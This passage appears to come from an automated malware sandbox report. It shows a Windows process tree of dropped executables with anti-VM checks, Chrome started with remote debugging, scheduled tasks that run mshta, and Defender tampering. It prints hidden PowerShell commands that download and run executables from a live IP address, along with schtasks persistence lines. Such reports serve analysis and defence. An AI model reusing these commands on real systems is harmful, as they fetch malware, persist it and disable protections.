                                  • C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:5792
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 864
                                    6⤵
                                    • Program crash
                                    PID:4308
                                • C:\Users\Admin\AppData\Local\Temp\1087760001\3omTNLZ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087760001\3omTNLZ.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:6568
                                • C:\Users\Admin\AppData\Local\Temp\1087761001\dzvh4HC.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087761001\dzvh4HC.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:1204
                                • C:\Users\Admin\AppData\Local\Temp\1087762001\oVpNTUm.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087762001\oVpNTUm.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Drops file in Windows directory
                                  PID:5364
                                • C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:5452
                                  • C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:5584
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 948
                                    6⤵
                                    • Program crash
                                    PID:6528
                                • C:\Users\Admin\AppData\Local\Temp\1087764001\DTQCxXZ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087764001\DTQCxXZ.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5244
                                • C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:5452
                                  • C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:4392
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1044
                                    6⤵
                                    • Program crash
                                    PID:6648
                                • C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:5736
                                  • C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:6328
                                  • C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5964
                                  • C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Checks processor information in registry
                                    PID:6384
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                      7⤵
                                      • Uses browser remote debugging
                                      • Enumerates system info in registry
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                      PID:5168
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffacc3bcc40,0x7ffacc3bcc4c,0x7ffacc3bcc58
                                        8⤵
                                          PID:7120
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2028 /prefetch:2
                                          8⤵
                                            PID:2880
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1988,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2284 /prefetch:3
                                            8⤵
                                              PID:1716
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2676 /prefetch:8
                                              8⤵
                                                PID:6380
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:2452
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3436 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:5716
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4360 /prefetch:2
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:1080
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4752,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4444 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:4352
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4972 /prefetch:8
                                                8⤵
                                                  PID:6772
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5048 /prefetch:8
                                                  8⤵
                                                    PID:1520
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
                                                    8⤵
                                                      PID:1516
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5276,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5268 /prefetch:8
                                                      8⤵
                                                        PID:6564
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1076
                                                    6⤵
                                                    • Program crash
                                                    PID:3712
                                                • C:\Users\Admin\AppData\Local\Temp\1087768001\d2YQIJa.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1087768001\d2YQIJa.exe"
                                                  5⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:3544
                                                • C:\Users\Admin\AppData\Local\Temp\1087769001\981724c33f.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1087769001\981724c33f.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:5744
                                                • C:\Users\Admin\AppData\Local\Temp\1087770001\84e276d43c.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1087770001\84e276d43c.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1280
                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1252
                                                • C:\Users\Admin\AppData\Local\Temp\1087771101\cd0ec7b16a.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1087771101\cd0ec7b16a.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:5808
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c schtasks /create /tn j1Knhma1md0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\iFSMHf8AS.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2084
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /tn j1Knhma1md0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\iFSMHf8AS.hta" /sc minute /mo 25 /ru "Admin" /f
                                                      7⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2152
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    mshta C:\Users\Admin\AppData\Local\Temp\iFSMHf8AS.hta
                                                    6⤵
                                                    • Checks computer location settings
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5720
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                      7⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Downloads MZ/PE file
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5076
                                                      • C:\Users\Admin\AppData\Local\TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE
                                                        "C:\Users\Admin\AppData\Local\TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE"
                                                        8⤵
                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        • Modifies Windows Defender TamperProtection settings
                                                        • Modifies Windows Defender notification settings
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Windows security modification
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:6604
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" "
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6072
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" any_word
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3512
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 2
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Delays execution with timeout.exe
                                                      PID:904
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1356
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5156
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:220
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6160
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6536
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6428
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /tn "WTYARmad4Nz" /tr "mshta \"C:\Temp\ec02jaXkO.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                      7⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:5512
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      mshta "C:\Temp\ec02jaXkO.hta"
                                                      7⤵
                                                      • Checks computer location settings
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6640
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                        8⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Downloads MZ/PE file
                                                        PID:5076
                                                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                          9⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5736
                                                • C:\Users\Admin\AppData\Local\Temp\1087773001\4c1447ebef.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1087773001\4c1447ebef.exe"
                                                  5⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetThreadContext
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6644
                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                    6⤵
                                                      PID:4384
                                                  • C:\Users\Admin\AppData\Local\Temp\1087774001\127efd171a.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1087774001\127efd171a.exe"
                                                    5⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5224
                                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                      6⤵
                                                        PID:5748
                                                    • C:\Users\Admin\AppData\Local\Temp\1087775001\59cc904836.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087775001\59cc904836.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:6068
                                                    • C:\Users\Admin\AppData\Local\Temp\1087776001\eee113fe4f.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087776001\eee113fe4f.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:6656
                                                    • C:\Users\Admin\AppData\Local\Temp\1087777001\4816cf3cfa.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087777001\4816cf3cfa.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      PID:5096
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 1592
                                                        6⤵
                                                        • Program crash
                                                        PID:5392
                                                    • C:\Users\Admin\AppData\Local\Temp\1087778001\fc1506d9ee.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087778001\fc1506d9ee.exe"
                                                      5⤵
                                                      • Enumerates VirtualBox registry keys
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4348
                                                    • C:\Users\Admin\AppData\Local\Temp\1087779001\5f6e285793.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087779001\5f6e285793.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5516
                                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe
                                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4296
                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe
                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe
                                                2⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Downloads MZ/PE file
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Loads dropped DLL
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of WriteProcessMemory
                                                PID:3092
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                  3⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:384
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffae28dcc40,0x7ffae28dcc4c,0x7ffae28dcc58
                                                    4⤵
                                                      PID:2936
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1808 /prefetch:2
                                                      4⤵
                                                        PID:2664
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2200 /prefetch:3
                                                        4⤵
                                                          PID:1160
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2544 /prefetch:8
                                                          4⤵
                                                            PID:3772
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            PID:3256
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3388 /prefetch:1
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            PID:1880
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4156,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:1
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            PID:3956
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
                                                            4⤵
                                                              PID:5032
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:8
                                                              4⤵
                                                                PID:4420
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4904 /prefetch:8
                                                                4⤵
                                                                  PID:864
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5044,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5056 /prefetch:8
                                                                  4⤵
                                                                    PID:1284
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
